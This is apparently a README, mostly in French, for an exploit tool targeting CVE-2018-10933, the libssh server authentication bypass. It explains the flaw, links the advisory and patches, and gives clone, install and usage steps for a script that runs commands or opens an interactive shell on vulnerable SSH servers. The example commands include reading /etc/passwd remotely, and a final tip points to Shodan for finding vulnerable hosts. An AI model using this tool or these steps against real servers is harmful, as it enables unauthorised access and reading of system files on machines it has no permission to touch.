
libSSH-Authentication-Bypass
Une vulnérabilité a été découverte dans la machine d'état côté serveur de libssh avant les versions 0.7.6 et 0.8.4. Un client malveillant pourrait créer des canaux sans avoir préalablement effectué l'authentification, entraînant un accès non autorisé.
Le problème vient de la manière dont libssh ne maintient pas l'état pour l'authentification et de la façon dont cela peut être utilisé pour contourner l'authentification. En gros, considérez la connexion comme un processus en plusieurs étapes : étape1, étape2, étape3... Comme libssh n'impose pas l'ordre des étapes, vous pouvez essentiellement sauter à l'étape3 sans passer par les étapes1 et 2.
Fait intéressant, le même problème a été découvert plus tôt dans la bibliothèque SSH Paramiko : CVE-2018-7750.
Exploit-DB : https://www.exploit-db.com/exploits/45638
Informations sur CVE-2018-10933 par libSSH : https://www.libssh.org/security/advisories/CVE-2018-10933.txt
Publication de correctifs par libSSH : https://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/
sudo apt-get install python3
gh repo clone EmmanuelCruzL/CVE-2018-10933
pip3 install -r requirements.txt
python3 main.py
usage: main.py [-h] [-p PORT] [-log] [-t | -c COMMAND | -i] host
Script for the vulnerabilities CVE-2018-10933
positional arguments:
host the ip or domain address of ssh server
options:
-h, --help show this help message and exit
-p PORT, --port PORT The port the service ssh, default [22]
-log, --logfile Logfile to write conn logs
-t, --test check the version of libSSH
-c COMMAND, --command COMMAND
command to execute
-i, --interactive open the interactive mode
python3 main.py 0.0.0.0 -port 22 -t

python3 main.py 0.0.0.0 -p 22 -c "cat /etc/passwd"

python3 main.py 0.0.0.0 -p 22 -l

[!] can find devices vulnerables using shodan.io
- ( 22 Port is default, other ports like (2222, 3333, 4444) might be including libSSH )
